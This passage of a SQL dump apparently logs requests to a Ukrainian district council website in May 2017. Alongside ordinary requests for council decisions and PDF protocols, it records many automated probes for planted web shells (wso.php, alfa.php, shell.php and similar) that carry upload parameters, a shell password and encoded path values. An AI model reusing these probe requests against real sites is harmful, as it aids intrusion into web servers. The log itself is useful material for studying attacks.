00:00:00',301),(30234,'http://malyn-rayrada.gov.ua/ws0.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:25','0000-00-00 00:00:00',301),(30235,'http://malyn-rayrada.gov.ua/active.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:36','0000-00-00 00:00:00',301),(30236,'http://malyn-rayrada.gov.ua/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:38','0000-00-00 00:00:00',301),(30237,'http://malyn-rayrada.gov.ua/images/stories/s.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:39','0000-00-00 00:00:00',301),(30238,'http://malyn-rayrada.gov.ua/images/stories/black.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:41','0000-00-00 00:00:00',301),(30239,'http://malyn-rayrada.gov.ua/images/p.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:44','0000-00-00 00:00:00',301),(30240,'http://malyn-rayrada.gov.ua/help.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-16 14:26:47','0000-00-00 00:00:00',301),(30241,'http://malyn-rayrada.gov.ua/libraries/respectmuslims.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:50','0000-00-00 00:00:00',301),(30242,'http://malyn-rayrada.gov.ua/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:26:56','0000-00-00 00:00:00',301),(30243,'http://malyn-rayrada.gov.ua/tmp/pz.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:00','0000-00-00 00:00:00',301),(30244,'http://malyn-rayrada.gov.ua/go.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:01','0000-00-00 00:00:00',301),(30245,'http://malyn-rayrada.gov.ua/wp-configuration.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:06','0000-00-00 00:00:00',301),(30246,'http://malyn-rayrada.gov.ua/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:10','0000-00-00 00:00:00',301),(30247,'http://malyn-rayrada.gov.ua/libraries/joomla/css.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:12','0000-00-00 00:00:00',301),(30248,'http://malyn-rayrada.gov.ua/images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:16','0000-00-00 00:00:00',301),(30249,'http://malyn-rayrada.gov.ua/tmp/petx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:16','0000-00-00 00:00:00',301),(30250,'http://malyn-rayrada.gov.ua/tmp/bogel.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:22','0000-00-00 00:00:00',301),(30251,'http://malyn-rayrada.gov.ua/images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:26','0000-00-00 00:00:00',301),(30252,'http://malyn-rayrada.gov.ua/libraries/joomla/wso.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:33','0000-00-00 00:00:00',301),(30253,'http://malyn-rayrada.gov.ua/cache/clean.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:38','0000-00-00 00:00:00',301),(30254,'http://malyn-rayrada.gov.ua/images/stories/a.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:43','0000-00-00 00:00:00',301),(30255,'http://malyn-rayrada.gov.ua/b1.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:48','0000-00-00 00:00:00',301),(30256,'http://malyn-rayrada.gov.ua/mide.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:49','0000-00-00 00:00:00',301),(30257,'http://malyn-rayrada.gov.ua/wp-content/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:54','0000-00-00 00:00:00',301),(30258,'http://malyn-rayrada.gov.ua/images/stories/shell.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:57','0000-00-00 00:00:00',301),(30259,'http://malyn-rayrada.gov.ua/images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:27:58','0000-00-00 00:00:00',301),(30260,'http://malyn-rayrada.gov.ua/images/stories/0day.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:04','0000-00-00 00:00:00',301),(30261,'http://malyn-rayrada.gov.ua/default_component.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:05','0000-00-00 00:00:00',301),(30262,'http://malyn-rayrada.gov.ua/images/w0rm.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:07','0000-00-00 00:00:00',301),(30263,'http://malyn-rayrada.gov.ua/images/sym.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:10','0000-00-00 00:00:00',301),(30264,'http://malyn-rayrada.gov.ua/images/wp-mail.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:16','0000-00-00 00:00:00',301),(30265,'http://malyn-rayrada.gov.ua/media/jmail.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:23','0000-00-00 00:00:00',301),(30266,'http://malyn-rayrada.gov.ua/images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:27','0000-00-00 00:00:00',301),(30267,'http://malyn-rayrada.gov.ua/images/upa.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:40','0000-00-00 00:00:00',301),(30268,'http://malyn-rayrada.gov.ua/images/stories/u.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:43','0000-00-00 00:00:00',301),(30269,'http://malyn-rayrada.gov.ua/images/stories/ali.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:48','0000-00-00 00:00:00',301),(30270,'http://malyn-rayrada.gov.ua/hh.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:49','0000-00-00 00:00:00',301),(30271,'http://malyn-rayrada.gov.ua/images/stories/gh.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:51','0000-00-00 00:00:00',301),(30272,'http://malyn-rayrada.gov.ua/images/upxx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:56','0000-00-00 00:00:00',301),(30273,'http://malyn-rayrada.gov.ua/images/stories/gass.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:28:57','0000-00-00 00:00:00',301),(30274,'http://malyn-rayrada.gov.ua/up14.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:29:04','0000-00-00 00:00:00',301),(30275,'http://malyn-rayrada.gov.ua/wp-installation.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:30:29','0000-00-00 00:00:00',301),(30276,'http://malyn-rayrada.gov.ua/e.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:30:37','0000-00-00 00:00:00',301),(30277,'http://malyn-rayrada.gov.ua/jijle3.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:30:42','0000-00-00 00:00:00',301),(30278,'http://malyn-rayrada.gov.ua/xup.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:30:43','0000-00-00 00:00:00',301),(30279,'http://malyn-rayrada.gov.ua/zebda.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:30:51','0000-00-00 00:00:00',301),(30280,'http://malyn-rayrada.gov.ua/kk.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:31:01','0000-00-00 00:00:00',301),(30281,'http://malyn-rayrada.gov.ua/wp_logns.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',1,0,'2017-05-16 14:31:06','0000-00-00 00:00:00',301),(30282,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1735-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-zatverdzhennya-strukturi-ta-granichnoji-chiselnosti-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',17,0,'2017-05-17 20:19:06','0000-00-00 00:00:00',301),(30283,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1735-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-zatverdzhennya-strukturi-ta-granichnoji-chiselnosti-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',26,0,'2017-05-17 23:09:11','0000-00-00 00:00:00',301),(30284,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1734-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-zatverdzhennya-strukturi-ta-shtatnogo-rozpisu-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',18,0,'2017-05-18 09:11:46','0000-00-00 00:00:00',301),(30285,'http://www.malyn-rayrada.gov.ua/tp=1',NULL,'','',2,0,'2017-05-18 12:32:40','0000-00-00 00:00:00',301),(30286,'http://www.malyn-rayrada.gov.ua/attachments/article/1708/додаток+до+рішення+порядок+обліку+витрат+транспортних+підпр..pdf',NULL,'','',1,0,'2017-05-18 21:50:43','0000-00-00 00:00:00',301),(30287,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1728-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',44,0,'2017-05-19 01:42:42','0000-00-00 00:00:00',301),(30288,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1736-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',28,0,'2017-05-19 08:18:03','0000-00-00 00:00:00',301),(30289,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1736-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',18,0,'2017-05-19 22:20:18','0000-00-00 00:00:00',301),(30290,'http://malyn-rayrada.gov.ua/attachments/article/1577/підсумки+відкритого+голосування+11+позачергова+сесія7.pdf',NULL,'','',1,0,'2017-05-20 17:06:07','0000-00-00 00:00:00',301),(30291,'http://malyn-rayrada.gov.ua/attachments/article/1482/протокол+1.pdf',NULL,'','',1,0,'2017-05-20 17:08:23','0000-00-00 00:00:00',301),(30292,'http://malyn-rayrada.gov.ua/attachments/article/1482/протокол+2.pdf',NULL,'','',1,0,'2017-05-20 17:12:07','0000-00-00 00:00:00',301),(30293,'http://malyn-rayrada.gov.ua/attachments/article/1711/бібліотека+протокол+2.pdf',NULL,'','',1,0,'2017-05-20 17:12:37','0000-00-00 00:00:00',301),(30294,'http://malyn-rayrada.gov.ua/attachments/article/1702/результати+22032017.pdf',NULL,'','',1,0,'2017-05-20 17:13:21','0000-00-00 00:00:00',301),(30295,'http://malyn-rayrada.gov.ua/attachments/article/1696/протокол+н2.pdf',NULL,'','',1,0,'2017-05-20 17:14:07','0000-00-00 00:00:00',301),(30296,'http://malyn-rayrada.gov.ua/attachments/article/2/декларація+ничипоренко+за+2015+рік.pdf',NULL,'','',1,0,'2017-05-20 17:16:36','0000-00-00 00:00:00',301),(30297,'http://malyn-rayrada.gov.ua/attachments/article/2/декларація+левковець.pdf',NULL,'','',1,0,'2017-05-20 17:18:36','0000-00-00 00:00:00',301),(30298,'http://malyn-rayrada.gov.ua/attachments/article/1696/протокол+н1.pdf',NULL,'','',1,0,'2017-05-20 17:18:51','0000-00-00 00:00:00',301),(30299,'http://malyn-rayrada.gov.ua/attachments/article/1706/протокол+бібліотека.pdf',NULL,'','',1,0,'2017-05-20 17:24:52','0000-00-00 00:00:00',301),(30300,'http://malyn-rayrada.gov.ua/527c2dc8-dc27-41c2-8bc7-996208f156e8',NULL,'','',1,0,'2017-05-20 20:01:08','0000-00-00 00:00:00',301),(30301,'http://malyn-rayrada.gov.ua/zabbix/jsrpc.php',NULL,'','',4,0,'2017-05-21 09:17:19','0000-00-00 00:00:00',301),(30302,'http://malyn-rayrada.gov.ua/zabbix//httpmon.php',NULL,'','',1,0,'2017-05-21 09:17:20','0000-00-00 00:00:00',301),(30303,'http://malyn-rayrada.gov.ua/zabbix//proxies.php',NULL,'','',1,0,'2017-05-21 09:17:22','0000-00-00 00:00:00',301),(30304,'http://malyn-rayrada.gov.ua/zabbix/api_jsonrpc.php',NULL,'','',1,0,'2017-05-21 09:17:22','0000-00-00 00:00:00',301),(30305,'http://www.malyn-rayrada.gov.ua/images/1ndex.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:15:52','0000-00-00 00:00:00',301),(30306,'http://www.malyn-rayrada.gov.ua/sqlbak.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:16:03','0000-00-00 00:00:00',301),(30307,'http://www.malyn-rayrada.gov.ua/email.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:16:16','0000-00-00 00:00:00',301),(30308,'http://www.malyn-rayrada.gov.ua/functions.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:16:32','0000-00-00 00:00:00',301),(30309,'http://www.malyn-rayrada.gov.ua/cache/news.php?z3=ehyzyvhslnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:16:47','0000-00-00 00:00:00',301),(30310,'http://www.malyn-rayrada.gov.ua/tmp.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',4,0,'2017-05-21 20:17:00','0000-00-00 00:00:00',301),(30311,'http://www.malyn-rayrada.gov.ua/shootme.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:17:20','0000-00-00 00:00:00',301),(30312,'http://www.malyn-rayrada.gov.ua/robots.txt.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:17:53','0000-00-00 00:00:00',301),(30313,'http://www.malyn-rayrada.gov.ua/jconfig.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:18:04','0000-00-00 00:00:00',301),(30314,'http://www.malyn-rayrada.gov.ua/media/reads.php?z3=ehyzyvhslnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:18:15','0000-00-00 00:00:00',301),(30315,'http://www.malyn-rayrada.gov.ua/media/1ndex.php?z3=ehyzyvhslnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:18:28','0000-00-00 00:00:00',301),(30316,'http://www.malyn-rayrada.gov.ua/sql_dump.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:18:35','0000-00-00 00:00:00',301),(30317,'http://www.malyn-rayrada.gov.ua/images/laj.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:18:42','0000-00-00 00:00:00',301),(30318,'http://www.malyn-rayrada.gov.ua/media/404.php?z3=ehyzyvhslnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:19:31','0000-00-00 00:00:00',301),(30319,'http://www.malyn-rayrada.gov.ua/media/tmp.php?z3=ehyzyvhslnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:19:57','0000-00-00 00:00:00',301),(30320,'http://www.malyn-rayrada.gov.ua/r3x.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:20:14','0000-00-00 00:00:00',301),(30321,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy9zdg9yawvzlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:20:37','0000-00-00 00:00:00',301),(30322,'http://www.malyn-rayrada.gov.ua/includes/u2p.php?z3=ehyzyvhslnboca==&z4=l2luy2x1zgvzlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:20:51','0000-00-00 00:00:00',301),(30323,'http://www.malyn-rayrada.gov.ua/images/xxx.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:21:09','0000-00-00 00:00:00',301),(30324,'http://www.malyn-rayrada.gov.ua/al277.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:21:23','0000-00-00 00:00:00',301),(30325,'http://www.malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=ehyzyvhslnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:21:36','0000-00-00 00:00:00',301),(30326,'http://www.malyn-rayrada.gov.ua/install.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:21:41','0000-00-00 00:00:00',301),(30327,'http://www.malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=ehyzyvhslnboca==&z4=l2rzd2f0lm9yzy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:22:05','0000-00-00 00:00:00',301),(30328,'http://www.malyn-rayrada.gov.ua/robot.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:22:23','0000-00-00 00:00:00',301),(30329,'http://www.malyn-rayrada.gov.ua/wsdl.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:22:30','0000-00-00 00:00:00',301),(30330,'http://www.malyn-rayrada.gov.ua/site/tmp/ctivrc.php?z3=ehyzyvhslnboca==&z4=l3npdguvdg1wlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:23:15','0000-00-00 00:00:00',301),(30331,'http://www.malyn-rayrada.gov.ua/wp-main.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:24:03','0000-00-00 00:00:00',301),(30332,'http://www.malyn-rayrada.gov.ua/images/al277.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:24:42','0000-00-00 00:00:00',301),(30333,'http://www.malyn-rayrada.gov.ua/webconfig.txt.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:24:56','0000-00-00 00:00:00',301),(30334,'http://www.malyn-rayrada.gov.ua/thumb.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:25:34','0000-00-00 00:00:00',301),(30335,'http://www.malyn-rayrada.gov.ua/sessioncontroller.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:26:25','0000-00-00 00:00:00',301),(30336,'http://www.malyn-rayrada.gov.ua/maill.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:26:46','0000-00-00 00:00:00',301),(30337,'http://www.malyn-rayrada.gov.ua/error-log.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:27:18','0000-00-00 00:00:00',301),(30338,'http://www.malyn-rayrada.gov.ua/authenticating.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:27:30','0000-00-00 00:00:00',301),(30339,'http://www.malyn-rayrada.gov.ua/images/google-assist.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:28:04','0000-00-00 00:00:00',301),(30340,'http://www.malyn-rayrada.gov.ua/images/robots.txt.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:28:16','0000-00-00 00:00:00',301),(30341,'http://www.malyn-rayrada.gov.ua/elements.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:28:36','0000-00-00 00:00:00',301),(30342,'http://www.malyn-rayrada.gov.ua/xmlsrpc.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:28:41','0000-00-00 00:00:00',301),(30343,'http://www.malyn-rayrada.gov.ua/wp-cache.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:28:52','0000-00-00 00:00:00',301),(30344,'http://www.malyn-rayrada.gov.ua/images/404.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:29:08','0000-00-00 00:00:00',301),(30345,'http://www.malyn-rayrada.gov.ua/images/head.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:29:14','0000-00-00 00:00:00',301),(30346,'http://www.malyn-rayrada.gov.ua/cache/support.php?z3=ehyzyvhslnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:29:24','0000-00-00 00:00:00',301),(30347,'http://www.malyn-rayrada.gov.ua/roseleif.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:29:31','0000-00-00 00:00:00',301),(30348,'http://www.malyn-rayrada.gov.ua/abbrevsprl.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:29:39','0000-00-00 00:00:00',301),(30349,'http://www.malyn-rayrada.gov.ua/show.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:29:53','0000-00-00 00:00:00',301),(30350,'http://www.malyn-rayrada.gov.ua/images/defau1t.php?z3=ehyzyvhslnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:30:08','0000-00-00 00:00:00',301),(30351,'http://www.malyn-rayrada.gov.ua/cli/40dd1d.php?z3=ehyzyvhslnboca==&z4=l2nsas8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:30:27','0000-00-00 00:00:00',301),(30352,'http://www.malyn-rayrada.gov.ua/infos.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:30:50','0000-00-00 00:00:00',301),(30353,'http://www.malyn-rayrada.gov.ua/cache/defau1t.php?z3=ehyzyvhslnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:31:03','0000-00-00 00:00:00',301),(30354,'http://www.malyn-rayrada.gov.ua/bookmark.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 